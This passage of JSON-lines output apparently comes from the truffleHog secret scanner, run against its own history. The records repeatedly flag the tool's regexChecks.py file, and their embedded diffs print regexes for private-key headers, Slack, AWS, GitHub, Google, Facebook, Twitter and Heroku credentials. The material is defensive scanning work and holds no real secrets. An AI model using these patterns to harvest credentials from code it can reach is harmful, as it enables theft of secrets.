re.compile('-----BEGIN RSA PRIVATE KEY-----'),\n+ \"SSH (OPENSSH) private key\": re.compile('-----BEGIN OPENSSH PRIVATE KEY-----'),\n+ \"SSH (DSA) private key\": re.compile('-----BEGIN DSA PRIVATE KEY-----'),\n+ \"SSH (EC) private key\": re.compile('-----BEGIN EC PRIVATE KEY-----'),\n+ \"PGP private key block\": re.compile('-----BEGIN PGP PRIVATE KEY BLOCK-----'),\n+ \"Facebook Oauth\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\\'|\"][0-9a-f]{32}[\\'|\"]'),\n+ \"Twitter Oauth\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\\'|\"][0-9a-zA-Z]{35,44}[\\'|\"]'),\n+ \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[[\\'|\"]0-9a-zA-Z]{35,40}[\\'|\"]'),\n+ \"Google Oauth\": re.compile('(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")'),\n+ \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),\n+ \"Heroku API Key\": re.compile('[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'),\n+ \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n+}\n+\n", "path": "truffleHog/defaultRegexes/regexChecks.py", "printDiff": "\u001b[93m-----BEGIN OPENSSH PRIVATE KEY-----\u001b[0m", "reason": "SSH (OPENSSH) private key", "stringsFound": ["-----BEGIN OPENSSH PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "Changing regexes to install regex package\n", "commitHash": "58690fe2e89d0aef28ae313c8554941104071bb1", "date": "2018-04-14 19:26:10", "diff": "@@ -0,0 +1,19 @@\n+import re\n+\n+regexes = {\n+ #\"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n+ \"Slack Token\": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),\n+ \"RSA private key\": re.compile('-----BEGIN RSA PRIVATE KEY-----'),\n+ \"SSH (OPENSSH) private key\": re.compile('-----BEGIN OPENSSH PRIVATE KEY-----'),\n+ \"SSH (DSA) private key\": re.compile('-----BEGIN DSA PRIVATE KEY-----'),\n+ \"SSH (EC) private key\": re.compile('-----BEGIN EC PRIVATE KEY-----'),\n+ \"PGP private key block\": re.compile('-----BEGIN PGP PRIVATE KEY BLOCK-----'),\n+ \"Facebook Oauth\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\\'|\"][0-9a-f]{32}[\\'|\"]'),\n+ \"Twitter Oauth\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\\'|\"][0-9a-zA-Z]{35,44}[\\'|\"]'),\n+ \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[[\\'|\"]0-9a-zA-Z]{35,40}[\\'|\"]'),\n+ \"Google Oauth\": re.compile('(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")'),\n+ \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),\n+ \"Heroku API Key\": re.compile('[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'),\n+ \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n+}\n+\n", "path": "truffleHog/defaultRegexes/regexChecks.py", "printDiff": "\u001b[93m-----BEGIN DSA PRIVATE KEY-----\u001b[0m", "reason": "SSH (DSA) private key", "stringsFound": ["-----BEGIN DSA PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "Changing regexes to install regex package\n", "commitHash": "58690fe2e89d0aef28ae313c8554941104071bb1", "date": "2018-04-14 19:26:10", "diff": "@@ -0,0 +1,19 @@\n+import re\n+\n+regexes = {\n+ #\"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n+ \"Slack Token\": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),\n+ \"RSA private key\": re.compile('-----BEGIN RSA PRIVATE KEY-----'),\n+ \"SSH (OPENSSH) private key\": re.compile('-----BEGIN OPENSSH PRIVATE KEY-----'),\n+ \"SSH (DSA) private key\": re.compile('-----BEGIN DSA PRIVATE KEY-----'),\n+ \"SSH (EC) private key\": re.compile('-----BEGIN EC PRIVATE KEY-----'),\n+ \"PGP private key block\": re.compile('-----BEGIN PGP PRIVATE KEY BLOCK-----'),\n+ \"Facebook Oauth\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\\'|\"][0-9a-f]{32}[\\'|\"]'),\n+ \"Twitter Oauth\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\\'|\"][0-9a-zA-Z]{35,44}[\\'|\"]'),\n+ \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[[\\'|\"]0-9a-zA-Z]{35,40}[\\'|\"]'),\n+ \"Google Oauth\": re.compile('(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")'),\n+ \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),\n+ \"Heroku API Key\": re.compile('[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'),\n+ \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n+}\n+\n", "path": "truffleHog/defaultRegexes/regexChecks.py", "printDiff": "\u001b[93m-----BEGIN EC PRIVATE KEY-----\u001b[0m", "reason": "SSH (EC) private key", "stringsFound": ["-----BEGIN EC PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "Changing regexes to install regex package\n", "commitHash": "58690fe2e89d0aef28ae313c8554941104071bb1", "date": "2018-04-14 19:26:10", "diff": "@@ -0,0 +1,19 @@\n+import re\n+\n+regexes = {\n+ #\"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n+ \"Slack Token\": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),\n+ \"RSA private key\": re.compile('-----BEGIN RSA PRIVATE KEY-----'),\n+ \"SSH (OPENSSH) private key\": re.compile('-----BEGIN OPENSSH PRIVATE KEY-----'),\n+ \"SSH (DSA) private key\": re.compile('-----BEGIN DSA PRIVATE KEY-----'),\n+ \"SSH (EC) private key\": re.compile('-----BEGIN EC PRIVATE KEY-----'),\n+ \"PGP private key block\": re.compile('-----BEGIN PGP PRIVATE KEY BLOCK-----'),\n+ \"Facebook Oauth\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\\'|\"][0-9a-f]{32}[\\'|\"]'),\n+ \"Twitter Oauth\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\\'|\"][0-9a-zA-Z]{35,44}[\\'|\"]'),\n+ \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[[\\'|\"]0-9a-zA-Z]{35,40}[\\'|\"]'),\n+ \"Google Oauth\": re.compile('(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")'),\n+ \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),\n+ \"Heroku API Key\": re.compile('[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'),\n+ \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n+}\n+\n", "path": "truffleHog/defaultRegexes/regexChecks.py", "printDiff": "\u001b[93m-----BEGIN PGP PRIVATE KEY BLOCK-----\u001b[0m", "reason": "PGP private key block", "stringsFound": ["-----BEGIN PGP PRIVATE KEY BLOCK-----"]} +{"branch": "origin/dev", "commit": "adding configurable rules and making the library import better\n", "commitHash": "5717db6fa94ea13244edfa37f9f62d1856db8aca", "date": "2018-01-14 23:56:27", "diff": "@@ -1,3 +0,0 @@\n-{\n- \"RSA private key\": \"-----BEGIN EC PRIVATE KEY-----\"\n-}\n", "path": "testRules.json", "printDiff": "\u001b[93m-----BEGIN EC PRIVATE KEY-----\u001b[0m", "reason": "SSH (EC) private key", "stringsFound": ["-----BEGIN EC PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "updating regex checks\n", "commitHash": "94c6d085bc2db0ab0ed7d8c13a4401001ed00777", "date": "2017-12-10 21:56:38", "diff": "@@ -1,7 +1,9 @@\n import re\n \n regexes = {\n- #\"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n+ \"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n+ \"Generic AppSecret\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*.[0-9a-zA-Z]{32,45}'),\n+ \"Generic AppSecret 2\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n \"Slack Token\": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),\n \"RSA private key\": re.compile('-----BEGIN RSA PRIVATE KEY-----'),\n \"SSH (OPENSSH) private key\": re.compile('-----BEGIN OPENSSH PRIVATE KEY-----'),\n@@ -9,10 +11,14 @@ regexes = {\n \"SSH (EC) private key\": re.compile('-----BEGIN EC PRIVATE KEY-----'),\n \"PGP private key block\": re.compile('-----BEGIN PGP PRIVATE KEY BLOCK-----'),\n \"Facebook Oauth\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\\'|\"][0-9a-f]{32}[\\'|\"]'),\n+ \"Facebook Oauth 2\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*.[0-9a-f]{32}'),\n \"Twitter Oauth\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\\'|\"][0-9a-zA-Z]{35,44}[\\'|\"]'),\n- \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[[\\'|\"]0-9a-zA-Z]{35,40}[\\'|\"]'),\n+ \"Twitter Oauth 2\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*.[0-9a-zA-Z]{35,44}'),\n+ \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[0-9a-zA-Z]{35,40}'),\n+ \"GitHub 2\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[c|C][l|L][i|I][e|E][n|N][T|T][s|S][e|E][c|C][r|R][e|E][t|T].*[0-9a-zA-Z]{35,40}'),\n \"Google Oauth\": re.compile('(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")'),\n- \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),\n+ \"Google Oauth 2\": re.compile('[c|C][l|L][i|I][e|E][n|N][T|T][_][s|S][e|E][c|C][r|R][e|E][t|T].*[:].*[a-zA-Z0-9-_]{24}'),\n+ \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),#[a|A][w|W][s|S].*AKIA[0-9A-Z]{16}'),\n \"Heroku API Key\": re.compile('[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'),\n \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n }\n", "path": "truffleHog/regexChecks.py", "printDiff": "\u001b[93m-----BEGIN RSA PRIVATE KEY-----\u001b[0m", "reason": "RSA private key", "stringsFound": ["-----BEGIN RSA PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "updating regex checks\n", "commitHash": "94c6d085bc2db0ab0ed7d8c13a4401001ed00777", "date": "2017-12-10 21:56:38", "diff": "@@ -1,7 +1,9 @@\n import re\n \n regexes = {\n- #\"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n+ \"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n+ \"Generic AppSecret\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*.[0-9a-zA-Z]{32,45}'),\n+ \"Generic AppSecret 2\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n \"Slack Token\": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),\n \"RSA private key\": re.compile('-----BEGIN RSA PRIVATE KEY-----'),\n \"SSH (OPENSSH) private key\": re.compile('-----BEGIN OPENSSH PRIVATE KEY-----'),\n@@ -9,10 +11,14 @@ regexes = {\n \"SSH (EC) private key\": re.compile('-----BEGIN EC PRIVATE KEY-----'),\n \"PGP private key block\": re.compile('-----BEGIN PGP PRIVATE KEY BLOCK-----'),\n \"Facebook Oauth\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\\'|\"][0-9a-f]{32}[\\'|\"]'),\n+ \"Facebook Oauth 2\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*.[0-9a-f]{32}'),\n \"Twitter Oauth\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\\'|\"][0-9a-zA-Z]{35,44}[\\'|\"]'),\n- \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[[\\'|\"]0-9a-zA-Z]{35,40}[\\'|\"]'),\n+ \"Twitter Oauth 2\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*.[0-9a-zA-Z]{35,44}'),\n+ \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[0-9a-zA-Z]{35,40}'),\n+ \"GitHub 2\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[c|C][l|L][i|I][e|E][n|N][T|T][s|S][e|E][c|C][r|R][e|E][t|T].*[0-9a-zA-Z]{35,40}'),\n \"Google Oauth\": re.compile('(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")'),\n- \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),\n+ \"Google Oauth 2\": re.compile('[c|C][l|L][i|I][e|E][n|N][T|T][_][s|S][e|E][c|C][r|R][e|E][t|T].*[:].*[a-zA-Z0-9-_]{24}'),\n+ \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),#[a|A][w|W][s|S].*AKIA[0-9A-Z]{16}'),\n \"Heroku API Key\": re.compile('[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'),\n \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n }\n", "path": "truffleHog/regexChecks.py", "printDiff": "\u001b[93m-----BEGIN OPENSSH PRIVATE KEY-----\u001b[0m", "reason": "SSH (OPENSSH) private key", "stringsFound": ["-----BEGIN OPENSSH PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "updating regex checks\n", "commitHash": "94c6d085bc2db0ab0ed7d8c13a4401001ed00777", "date": "2017-12-10 21:56:38", "diff": "@@ -1,7 +1,9 @@\n import re\n \n regexes = {\n- #\"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n+ \"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n+ \"Generic AppSecret\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*.[0-9a-zA-Z]{32,45}'),\n+ \"Generic AppSecret 2\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n \"Slack Token\": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),\n \"RSA private key\": re.compile('-----BEGIN RSA PRIVATE KEY-----'),\n \"SSH (OPENSSH) private key\": re.compile('-----BEGIN OPENSSH PRIVATE KEY-----'),\n@@ -9,10 +11,14 @@ regexes = {\n \"SSH (EC) private key\": re.compile('-----BEGIN EC PRIVATE KEY-----'),\n \"PGP private key block\": re.compile('-----BEGIN PGP PRIVATE KEY BLOCK-----'),\n \"Facebook Oauth\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\\'|\"][0-9a-f]{32}[\\'|\"]'),\n+ \"Facebook Oauth 2\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*.[0-9a-f]{32}'),\n \"Twitter Oauth\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\\'|\"][0-9a-zA-Z]{35,44}[\\'|\"]'),\n- \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[[\\'|\"]0-9a-zA-Z]{35,40}[\\'|\"]'),\n+ \"Twitter Oauth 2\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*.[0-9a-zA-Z]{35,44}'),\n+ \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[0-9a-zA-Z]{35,40}'),\n+ \"GitHub 2\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[c|C][l|L][i|I][e|E][n|N][T|T][s|S][e|E][c|C][r|R][e|E][t|T].*[0-9a-zA-Z]{35,40}'),\n \"Google Oauth\": re.compile('(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")'),\n- \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),\n+ \"Google Oauth 2\": re.compile('[c|C][l|L][i|I][e|E][n|N][T|T][_][s|S][e|E][c|C][r|R][e|E][t|T].*[:].*[a-zA-Z0-9-_]{24}'),\n+ \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),#[a|A][w|W][s|S].*AKIA[0-9A-Z]{16}'),\n \"Heroku API Key\": re.compile('[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'),\n \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n }\n", "path": "truffleHog/regexChecks.py", "printDiff": "\u001b[93m-----BEGIN EC PRIVATE KEY-----\u001b[0m", "reason": "SSH (EC) private key", "stringsFound": ["-----BEGIN EC PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "updating regex checks\n", "commitHash": "94c6d085bc2db0ab0ed7d8c13a4401001ed00777", "date": "2017-12-10 21:56:38", "diff": "@@ -1,7 +1,9 @@\n import re\n \n regexes = {\n- #\"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n+ \"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n+ \"Generic AppSecret\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*.[0-9a-zA-Z]{32,45}'),\n+ \"Generic AppSecret 2\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n \"Slack Token\": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),\n \"RSA private key\": re.compile('-----BEGIN RSA PRIVATE KEY-----'),\n \"SSH (OPENSSH) private key\": re.compile('-----BEGIN OPENSSH PRIVATE KEY-----'),\n@@ -9,10 +11,14 @@ regexes = {\n \"SSH (EC) private key\": re.compile('-----BEGIN EC PRIVATE KEY-----'),\n \"PGP private key block\": re.compile('-----BEGIN PGP PRIVATE KEY BLOCK-----'),\n \"Facebook Oauth\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\\'|\"][0-9a-f]{32}[\\'|\"]'),\n+ \"Facebook Oauth 2\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*.[0-9a-f]{32}'),\n \"Twitter Oauth\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\\'|\"][0-9a-zA-Z]{35,44}[\\'|\"]'),\n- \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[[\\'|\"]0-9a-zA-Z]{35,40}[\\'|\"]'),\n+ \"Twitter Oauth 2\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*.[0-9a-zA-Z]{35,44}'),\n+ \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[0-9a-zA-Z]{35,40}'),\n+ \"GitHub 2\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[c|C][l|L][i|I][e|E][n|N][T|T][s|S][e|E][c|C][r|R][e|E][t|T].*[0-9a-zA-Z]{35,40}'),\n \"Google Oauth\": re.compile('(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")'),\n- \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),\n+ \"Google Oauth 2\": re.compile('[c|C][l|L][i|I][e|E][n|N][T|T][_][s|S][e|E][c|C][r|R][e|E][t|T].*[:].*[a-zA-Z0-9-_]{24}'),\n+ \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),#[a|A][w|W][s|S].*AKIA[0-9A-Z]{16}'),\n \"Heroku API Key\": re.compile('[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'),\n \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n }\n", "path": "truffleHog/regexChecks.py", "printDiff": "\u001b[93m-----BEGIN PGP PRIVATE KEY BLOCK-----\u001b[0m", "reason": "PGP private key block", "stringsFound": ["-----BEGIN PGP PRIVATE KEY BLOCK-----"]} +{"branch": "origin/dev", "commit": "Merge https://github.com/carnal0wnage/truffleHog-1 into dev\n", "commitHash": "4e1884de29ccc5ca2a9a6c3c19fe912a4ae60ea1", "date": "2017-12-10 21:49:19", "diff": "@@ -2,24 +2,13 @@ import re\n \n regexes = {\n \"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n- \"Generic AppSecret\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*.[0-9a-zA-Z]{32,45}'),\n- \"Generic AppSecret 2\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n \"Slack Token\": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),\n \"RSA private key\": re.compile('-----BEGIN RSA PRIVATE KEY-----'),\n- \"SSH (OPENSSH) private key\": re.compile('-----BEGIN OPENSSH PRIVATE KEY-----'),\n- \"SSH (DSA) private key\": re.compile('-----BEGIN DSA PRIVATE KEY-----'),\n- \"SSH (EC) private key\": re.compile('-----BEGIN EC PRIVATE KEY-----'),\n- \"PGP private key block\": re.compile('-----BEGIN PGP PRIVATE KEY BLOCK-----'),\n \"Facebook Oauth\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\\'|\"][0-9a-f]{32}[\\'|\"]'),\n- \"Facebook Oauth 2\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*.[0-9a-f]{32}'),\n \"Twitter Oauth\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\\'|\"][0-9a-zA-Z]{35,44}[\\'|\"]'),\n- \"Twitter Oauth 2\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*.[0-9a-zA-Z]{35,44}'),\n- \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[0-9a-zA-Z]{35,40}'),\n- \"GitHub 2\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[c|C][l|L][i|I][e|E][n|N][T|T][s|S][e|E][c|C][r|R][e|E][t|T].*[0-9a-zA-Z]{35,40}'),\n \"Google Oauth\": re.compile('(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")'),\n- \"Google Oauth 2\": re.compile('[c|C][l|L][i|I][e|E][n|N][T|T][_][s|S][e|E][c|C][r|R][e|E][t|T].*[:].*[a-zA-Z0-9-_]{24}'),\n \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),#[a|A][w|W][s|S].*AKIA[0-9A-Z]{16}'),\n \"Heroku API Key\": re.compile('[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'),\n- \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n+ \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]')\n }\n \n", "path": "truffleHog/regexChecks.py", "printDiff": "\u001b[93m-----BEGIN RSA PRIVATE KEY-----\u001b[0m", "reason": "RSA private key", "stringsFound": ["-----BEGIN RSA PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "Merge https://github.com/carnal0wnage/truffleHog-1 into dev\n", "commitHash": "4e1884de29ccc5ca2a9a6c3c19fe912a4ae60ea1", "date": "2017-12-10 21:49:19", "diff": "@@ -2,24 +2,13 @@ import re\n \n regexes = {\n \"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n- \"Generic AppSecret\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*.[0-9a-zA-Z]{32,45}'),\n- \"Generic AppSecret 2\": re.compile('[a|A][p|P][p|P][s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n \"Slack Token\": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),\n \"RSA private key\": re.compile('-----BEGIN RSA PRIVATE KEY-----'),\n- \"SSH (OPENSSH) private key\": re.compile('-----BEGIN OPENSSH PRIVATE KEY-----'),\n- \"SSH (DSA) private key\": re.compile('-----BEGIN DSA PRIVATE KEY-----'),\n- \"SSH (EC) private key\": re.compile('-----BEGIN EC PRIVATE KEY-----'),\n- \"PGP private key block\": re.compile('-----BEGIN PGP PRIVATE KEY BLOCK-----'),\n \"Facebook Oauth\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\\'|\"][0-9a-f]{32}[\\'|\"]'),\n- \"Facebook Oauth 2\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*.[0-9a-f]{32}'),\n \"Twitter Oauth\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\\'|\"][0-9a-zA-Z]{35,44}[\\'|\"]'),\n- \"Twitter Oauth 2\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*.[0-9a-zA-Z]{35,44}'),\n- \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[0-9a-zA-Z]{35,40}'),\n- \"GitHub 2\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[c|C][l|L][i|I][e|E][n|N][T|T][s|S][e|E][c|C][r|R][e|E][t|T].*[0-9a-zA-Z]{35,40}'),\n \"Google Oauth\": re.compile('(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")'),\n- \"Google Oauth 2\": re.compile('[c|C][l|L][i|I][e|E][n|N][T|T][_][s|S][e|E][c|C][r|R][e|E][t|T].*[:].*[a-zA-Z0-9-_]{24}'),\n \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),#[a|A][w|W][s|S].*AKIA[0-9A-Z]{16}'),\n \"Heroku API Key\": re.compile('[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'),\n- \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n+ \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]')\n }\n \n", "path": "truffleHog/regexChecks.py", "printDiff": "\u001b[93m-----BEGIN OPENSSH PRIVATE KEY-----\u001b[0m", "reason": "SSH (OPENSSH) private key", "stringsFound": ["-----BEGIN OPENSSH PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "Merge https://github.com/carnal0wnage/truffleHog-1 into 